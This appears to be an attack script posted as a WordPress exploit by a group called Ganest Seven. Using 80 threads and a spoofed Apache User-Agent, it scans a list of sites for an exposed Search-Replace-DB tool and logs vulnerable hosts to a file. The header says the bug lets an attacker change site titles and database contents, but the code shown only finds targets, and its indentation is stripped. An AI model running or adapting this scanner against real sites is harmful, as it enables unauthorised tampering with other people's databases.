# Exploit Title : Wordpress Replace DataBase
# Discovery : Demon King
# Team : Ganest Seven
# This bug changes the title and database name all
#
import requests
import sys
from multiprocessing.dummy import Pool
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from colorama import Fore
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
listSite = sys.argv[1]
op = [i.strip() for i in open(listSite, "r").readlines()]
fr = '\033[91m'
fc = '\033[96m'
fw = '\033[0m'
fg = '\033[92m'
CYAN = '\033[96m'
GREEN = '\033[92m'
RED = '\033[91m'
END = '\033[0m'
headers = {"User-Agent": "Apache/2.4.34 (Ubuntu) OpenSSL/1.1.1 (internal dummy connection)",
"Accept": "*/*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest",
"Connection": "close"}
def check(site):
try:
r = requests.get("http://" + site + "/Search-Replace-DB-master", headers=headers, timeout=5)
ff = open("ignition.txt", "a+")
if 'The GET method is not supported' in r.content:
print("http://" + site + "/ -> SRDB!")
ff.write("http://" + site + "/\n")
else:
print("http://" + site + " -> x")
except:
print("http://" + site + " -> BOSOK")
kekw = Pool(80) #thread
kekw.map(check, op)
kekw.close()
kekw.join()